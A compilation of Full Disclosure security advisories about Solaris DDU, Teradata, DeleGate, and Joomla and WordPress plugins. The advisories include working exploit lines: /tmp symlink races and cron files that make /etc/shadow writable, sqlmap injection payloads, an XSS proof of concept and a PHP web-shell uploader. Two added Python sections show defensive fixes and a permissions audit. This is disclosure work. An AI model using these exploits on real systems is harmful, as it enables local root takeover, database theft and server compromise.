[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE: CVE-2020-14724
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle, fixed in July 14 2020 CPU https://www.oracle.com/security-alerts/cpujul2020.html
Vendor Notified: 2020-02-02
Vendor Contact: secalert...@oracle.com
Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack:

In ./ddu-text/utils/ddu-text.py

    18  LOG_LOCATION = "/tmp/ddu_log"
    .
    45:     print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION
    50:     logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL,

Elevation of privileges via symlink attack due to chmod operation on /tmp file:

In file ./ddu-text/utils/inner_window.py

    667:    logfile = open('/tmp/ddu_err.log', 'a')
    695:    logfile = open('/tmp/ddu_err.log', 'a')
    721:    logfile = open('/tmp/ddu_err.log', 'a')
    748:    logfile = open('/tmp/ddu_err.log', 'a')

In file ./scripts/comp_lookup.sh

    33:typeset err_log=/tmp/ddu_err.log

In file ./scripts/det_info.sh

    38:typeset err_log=/tmp/ddu_err.log

In file ./scripts/pkg_relate.sh

    449:typeset err_log=/tmp/ddu_err.log

In file ./scripts/find_media.sh

    20:typeset err_log=/tmp/ddu_err.log

There is a race condition here between file creation and chmod 666 where a local user can run a simple script to ensure the symlink exists after the ddu_err.log file is removed:

In file ./scripts/probe.sh

    569:    # Make /tmp/ddu_err.log writable for every user
    571:    if [ -f /tmp/ddu_err.log ]; then
    572:        pfexec chmod 666 /tmp/ddu_err.log
    574:        touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log
    636:typeset err_log=/tmp/ddu_err.log

These are also potential file clobbering issues:

From probe.sh

    131:    NIC_info_file=/tmp/dvt_network_info_file
    133:    temp_file=/tmp/dvt_network_temp
    134:    temp_file_2=/tmp/dvt_network_temp_2
    207:    c_file=/tmp/str_ctrl_file
    208:    c_file1=/tmp/str_ctrl_file_1
    209:    c_file2=/tmp/str_ctrl_file_2
    210:    c_file3=/tmp/str_ctrl_file_3
    211:    c_file4=/tmp/str_ctrl_file_4
    212:    c_file5=/tmp/str_ctrl_file_5
    328:    dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile
    329:    dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile
    330:    dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1
    398:    temp_file1=/tmp/dvt_tmp_file1
    399:    temp_file2=/tmp/dvt_tmp_file2
    462:    cpu_tmpfile=/tmp/cpu_tmpfile
    490:    memory_tmpfile=/tmp/memory_tmpfile
    624:typeset ctl_file=/tmp/dvt_ctl_file

Exploit Code:

Tested on Solaris 11 x86

    larry@SolSun:~$ uname -a
    SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

and Open Indiana

    root@openindiana:/export/home/larry# uname -a
    SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

Append content to /etc/passwd

    larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log

To get local root simply have ddu chmod 666 /etc/shadow

    larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done

A better exploit: https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

Patches to OpenIndiana https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27

Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.

Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code.

    http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php;
    http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

    https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0
Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
Hello All,

These are really great advisories, my only wish is that they were copied to the security lists in their entirety. This way we aren't relying on a single point of failure (your website) when looking for the data in the future.

Thanks!
Larry

> On Nov 19, 2016, at 5:48 AM, Summer of Pwnage wrote:
>
> Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
>
> Yorick Koster, July 2016
>
> Abstract
>
> A Cross-Site Scripting vulnerability was found in the WP Canvas - Shortcodes WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. This issue can be exploited by authenticated users with the Contributor or higher role.
>
> OVE ID
>
> OVE-20160724-0031
>
> Tested versions
>
> This issue was successfully tested on WP Canvas - Shortcodes WordPress Plugin version 1.92.
>
> Fix
>
> This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin version 2.07.
>
> Details
>
> https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
>
> Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.
[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact

Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP).

Vulnerability: The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges.

    $ grep -n "/tmp" studioexpressinstall
    33:ASKDIRFILE=/tmp/sqlajeaskdir
    41:DEF_TRACEFILE=/tmp/studioexinstall.log
    44:TMP=/tmp
    72:SQLAJEINPUTS=/tmp/studioexinputs
    90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
    103:SQLAJEINSTALL=/tmp/studioexpressinstall
    136:    java -version > "/tmp/javaver" 2>&1
    137:    verstring=`grep "java version" /tmp/javaver`
    143:    jre64b=`grep "64-Bit" /tmp/javaver`
    212:rm -f /tmp/javaver
    341:    tmptracefile=/tmp/studioexinstall.log.tmp    #Temporary trace file.
    588:touch /tmp/checkstudioexinstall
    603:rm -f /tmp/checkstudioexinstall
    604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490

Exploit Code:

    $ ln -s /etc/passwd /tmp/javaver

Advisory: http://www.vapidlabs.com/advisory.php?v=174
[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact

Description: Teradata is a relational database; they provide a Virtual Machine image for developers and community use.

Vulnerability: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution.

In /opt/teradata/gsctools/bin/t2a.pl

    320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ;

If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it, they can inject commands to be executed as that user, for example:

    $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done

If root or any other account runs that .pl script I see these files being created in /tmp:

    [C] -rw-r- 1 root root  14 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
    [U] -rw-r- 1 root root  14 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
    [C] -rw-r- 1 root root   0 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
    [C] -rw-r- 1 root root   0 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
    [U] -rw-r- 1 root root  44 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
    [U] -rw-r- 1 root root 152 Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
    [C] -rw-r- 1 root root   5 Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
    [U] -rw-r- 1 root root   5 Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
    [M] -rwxr-x--- 1 root root 5 Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr

CVE-ID: CVE-2016-7489

Exploit Code:

    $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done

Advisory: www.vapidlabs.com/advisory.php?v=173
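The defect shared by the three /tmp posts above (DDU, studioexpressinstall and t2a.pl) is a predictable file name in a directory every local user can write to, opened and then chmod'ed or executed, so a symlink planted there first redirects the write. The following is an added Python example, not code from any of the advisories or the affected products: it builds its own sandbox directory instead of touching /tmp, plants a symlink the way the race winner would, and shows the insecure pattern writing through the link while the two hardened variants (O_NOFOLLOW on a fixed path, and tempfile.mkstemp in a private directory) do not. It assumes a POSIX system; the sandbox, the "victim" file and the log text are constructed for the demonstration.

```python
import os
import stat
import tempfile


def insecure_append(log_path, text):
    """The pattern from the advisories: a fixed, predictable name in a shared
    directory, opened with 'a' and then made world-writable.

    open() follows whatever symlink another local user planted at log_path,
    so both the write and the chmod land on the link's target."""
    with open(log_path, "a") as fh:
        fh.write(text)
    os.chmod(log_path, 0o666)          # applied through the link as well
    return os.path.realpath(log_path)


def safe_append(log_path, text):
    """Hardened form for a fixed path: refuse to follow a symlink at the last
    component (O_NOFOLLOW makes open() fail with ELOOP instead of writing
    through the link), create with mode 0600, never loosen permissions."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(log_path, flags, 0o600)
    try:
        st = os.fstat(fd)
        # Belt and braces: only write into a regular file that we own.
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
            raise PermissionError(f"{log_path}: not a regular file owned by us")
        os.write(fd, text.encode())
    finally:
        os.close(fd)
    return os.path.realpath(log_path)


def private_logfile(prefix="ddu_err."):
    """Best option: an unpredictable name inside a fresh 0700 directory,
    created with O_EXCL and mode 0600 by the tempfile module, so there is no
    name for anyone else to pre-create or link."""
    workdir = tempfile.mkdtemp(prefix=prefix)
    fd, path = tempfile.mkstemp(prefix=prefix, dir=workdir)
    return fd, path


def demo():
    """Constructed sandbox standing in for /tmp and for the system file a
    planted symlink would point at. Returns what each variant did."""
    shared = tempfile.mkdtemp(prefix="symlink-demo.")
    victim = os.path.join(shared, "victim.txt")        # stands in for /etc/passwd
    with open(victim, "w") as fh:
        fh.write("original\n")
    os.chmod(victim, 0o600)
    link = os.path.join(shared, "ddu_err.log")
    os.symlink(victim, link)                           # what the race winner leaves behind

    result = {}
    insecure_append(link, "injected\n")
    with open(victim) as fh:
        result["victim_after_insecure"] = fh.read()
    result["victim_mode_after_insecure"] = stat.S_IMODE(os.stat(victim).st_mode)

    try:
        safe_append(link, "injected\n")
        result["safe_error"] = None
    except OSError as exc:
        result["safe_error"] = type(exc).__name__

    clean = os.path.join(shared, "clean.log")          # no link planted here
    safe_append(clean, "log line\n")
    with open(clean) as fh:
        result["safe_clean_write"] = fh.read()
    result["safe_clean_mode"] = stat.S_IMODE(os.stat(clean).st_mode)

    fd, path = private_logfile()
    os.write(fd, b"log line\n")
    os.close(fd)
    result["private_mode"] = stat.S_IMODE(os.stat(path).st_mode)
    result["private_in_shared_dir"] = os.path.dirname(path) == shared
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running it shows the victim file gaining the "injected" line and mode 0666 through the insecure path, while safe_append raises OSError (ELOOP) on the planted link and only ever creates 0600 files. The mkstemp variant is the one to reach for in a new script; O_NOFOLLOW is the minimal change when a fixed path cannot be avoided, and it still leaves a hard link or a pre-created regular file to worry about, which is what the ownership check after fstat() is for.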
[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact

Description: A database appliance for virtual machine environments.

Vulnerability: Teradata Virtual Machine Community Edition v15.10 has insecure file permissions on /etc/luminex/pkgmgr. These could allow a local user to modify its contents and execute commands as root.

    TVME:/ # ls -ld /etc/luminex/
    drwxrwxrwx 2 root root 4096 Mar  3  2016 /etc/luminex/
    TVME:/ # ls -l /etc/luminex/
    total 128
    -rwxrwxrwx 1 root root  24576 Mar  3  2016 packages.db
    -rwxrwxrwx 1 root root 102357 Mar  3  2016 pkgmgr

CVE: CVE-2016-7488

Exploit Code:

    $ echo "#!/bin/bash" > /etc/luminex/pkgmgr
    $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
    $ chmod 755 /etc/luminex/pkgmgr

Advisory: http://www.vapidlabs.com/advisory.php?v=172
[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com

Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.

Vulnerability: The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:

In file ajax_url.php:

    11 define('_JEXEC',1);
    12 defined('_JEXEC') or die('Restircted access');
    .
    .
    .
    49 $page = $_POST["page"];
    50 $num=$_POST['perpage'];
    51 $start = $page * $num - $num;
    52 $idofgallery=$_POST['galleryid'];
    53 $level = $_POST['level'];
    54 $query = $db->getQuery(true);
    55 $query->select('*');
    56 $query->from('#__huge_itportfolio_images');
    57 $query->where('portfolio_id ='.$idofgallery);
    58 $query ->order('#__huge_itportfolio_images.ordering asc');
    59 $db->setQuery($query,$start,$num);

CVE-2016-1000124

Exploit Code:

    $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1=*=huge_it_portfolio_gallery_ajax=20=2" --level=5 --risk=3

    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: page=1=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#=huge_it_portfolio_gallery_ajax=20=2

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: page=1=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)=huge_it_portfolio_gallery_ajax=20=2
    ---
    [13:30:39] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [13:30:39] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2715 times
    [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

    [*] shutting down at 13:30:39

Advisory: http://www.vapidlabs.com/advisory.php?v=170
[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com

Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.

Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.

Vulnerable Code in: ajax_url.php

    11 define('_JEXEC', 1);
    12 defined('_JEXEC') or die('Restircted access');
    .
    .
    .
    308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
    309     $catalog_id = $_POST["catalog_id"];
    310     $old_count = $_POST["old_count"];
    311     $count_into_page = $_POST["count_into_page"];
    312     $show_thumbs = $_POST["show_thumbs"];
    313     $show_description = $_POST["show_description"];
    314     $show_linkbutton = $_POST["show_linkbutton"];
    315     $parmalink = $_POST["parmalink"];
    316     $level = $_POST['level'];
    .
    .
    .
    359     $query->select('*');
    360     $query->from('#__huge_it_catalog_products');
    361     $query->where('catalog_id =' . $catalog_id);
    362     $query->order('ordering asc');
    363     $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125

Exploit Code:

    $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1=load_more_elements_into_catalog_id=*_count=*_into_page=*_thumbs=*_description=*=*" --level=5 --risk=3

    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: prod_page=1=load_more_elements_into_catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#_count=_into_page=_thumbs=_description==

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: prod_page=1=load_more_elements_into_catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)_count=_into_page=_thumbs=_description==

        Type: UNION query
        Title: Generic UNION query (random number) - 15 columns
        Payload: prod_page=1=load_more_elements_into_catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy_count=_into_page=_thumbs=_description==
    ---
    [16:48:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [16:48:10] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 6637 times
    [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

    [*] shutting down at 16:48:10

Advisory: http://www.vapidlabs.com/advisory.php?v=171
[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: i...@huge-it.com

Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.

Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability:

SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php

    51 public function getPropertie() {
    52     $db = JFactory::getDBO();
    53     $id_cat = JRequest::getVar('id');
    54     $query = $db->getQuery(true);
    55     $query->select('#__huge_itgallery_images.name as name,'
    56         . '#__huge_itgallery_images.id ,'
    57         . '#__huge_itgallery_gallerys.name as portName,'
    58         . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
    59     $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));
    60     $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
    61     $query->order('ordering desc');
    62
    64     $db->setQuery($query);
    65     $results = $db->loadObjectList();
    66     return $results;
    67 }

XSS is here:

    root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
    ./administrator/components/com_gallery/views/gallery/tmpl/default.php
    root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
    256:

CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection

Exploit Code:

XSS PoC

    http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC

    http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=SQLiHERE
    $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery=gallery=*" --dbms mysql

Advisory: http://www.vapidlabs.com/advisory.php?v=164
[FD] Local root vulnerability in DeleGate v9.9.13
Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ http://delegate.org/delegate/
Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.s...@delegate.org ys...@etl.go.jp

Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.

Vulnerability: Installation of delegate 9.9.13 sets some binaries setuid root; at least one of these binaries can be used to escalate the privileges of a local user. The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk. By creating a file in /etc/cron.hourly a local user can execute commands as root.

Installation of the software via source or binary distribution with the option to not run as root results in a script, setup-subin.sh, being run which sets the setuid bit on four binaries. In Linux distributions where this software is part of the package list these binaries are not setuid root (archlinux).

From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to English):

    Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe. "In Unix version subin in if you want to use "(such as when using a privileged port), do the following.

    (3-2uk)
    $ cd DgRoot/subin
    $ sh setup-subin.sh

    larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
    total 1916
    -r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
    -r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
    -r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
    -rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
    -rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
    -r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
    -rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh

This script sets the setuid bit on four binaries:

    larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
    #!/bin/sh
    SUBINS="dgpam dgbind dgchroot dgcpnod"
    sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
    if [ $? != 0 ]; then
        su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
    fi

CVEID: CVE-2015-7556

Exploit Code:

    $ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme
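Both the DeleGate post above (setup-subin.sh leaving four binaries setuid root) and the Teradata /etc/luminex post (a root-owned directory and script that are mode 777) are the kind of thing a permissions audit of an installed product should surface before anyone else does. The following is an added Python example, not from either vendor or from the advisories: it walks a tree without following symlinks and reports setuid/setgid executables and world-writable files or directories, exempting sticky directories like /tmp. The tree it audits in demo() is constructed to mirror the two findings, plus benign entries that must stay quiet; the helper name and layout are this example's own.

```python
import os
import stat
import tempfile


def audit_tree(root):
    """Walk root (not following symlinks) and return {relative path: info} for
    entries a local user could abuse: regular files carrying the setuid or
    setgid bit, and files or directories writable by everyone. A sticky
    world-writable directory (1777, e.g. /tmp) is exempt. The owner uid and
    mode are kept so root-owned hits stand out in the report."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue                 # the target is reported when we reach it
            tags = []
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                tags.append("setuid")
            if stat.S_ISREG(mode) and mode & stat.S_ISGID:
                tags.append("setgid")
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                tags.append("world-writable")
            if tags:
                rel = os.path.relpath(path, root)
                findings[rel] = {"uid": st.st_uid, "mode": oct(stat.S_IMODE(mode)), "tags": tags}
    return findings


def demo():
    """Constructed tree modelled on the two advisories: a world-writable
    etc/luminex holding a world-writable pkgmgr, a subin directory whose
    dgcpnod is setuid, and benign entries that must not be reported.
    Returns {relative path: tags}."""
    root = tempfile.mkdtemp(prefix="perm-audit.")

    def make(rel, mode, is_dir=False):
        path = os.path.join(root, rel)
        if is_dir:
            os.makedirs(path)
        else:
            open(path, "w").close()
        os.chmod(path, mode)        # chmod ignores the umask, so the mode is exact

    make("etc", 0o755, True)
    make("etc/luminex", 0o777, True)
    make("etc/luminex/pkgmgr", 0o777)
    make("etc/luminex/packages.db", 0o644)     # benign here, unlike the real appliance
    make("subin", 0o755, True)
    make("subin/dgcpnod", 0o4755)              # setuid, like the DeleGate subin binaries
    make("subin/dgdate", 0o755)
    make("tmp", 0o1777, True)                  # sticky: expected, not reported
    make("tmp/ddu_err.log", 0o600)
    return {rel: info["tags"] for rel, info in audit_tree(root).items()}


if __name__ == "__main__":
    for rel, tags in sorted(demo().items()):
        print(f"{rel}: {', '.join(tags)}")
```

Pointed at a real system root, audit_tree() is the Python equivalent of `find / -perm -4000` plus `find / -perm -o+w ! -type l`; filtering the output to uid 0 gives the short list that matters, and diffing it against a known-good baseline after each product install catches an installer that quietly loosens permissions the way the two above did.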
Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
> On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote:
>
> Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
> Author: Larry W. Cashdollar, @_larry0
> Date: 2015-07-09
> Download Site: https://wordpress.org/plugins/mailcwp/
> Vendor: CadreWorks Pty Ltd
> Vendor Notified: 2015-07-09 fixed in v1.110

Typo should be v1.100.
[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site

Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.

Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded; any user can upload a shell to the target wordpress server:

    2 $message_id = $_REQUEST["message_id"];
    3 $upload_dir = $_REQUEST["upload_dir"];
    .
    .
    8 $fileName = $_FILES["file"]["name"];
    9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http server root.

CVEID:
OSVDB:

Exploit Code:

    <?php
    /*Larry W. Cashdollar @_larry0
    Exploit for mailcwp v1.99 shell will be called 1-shell.php.
    7/9/2015
    */
    $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";
    $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
    ?>

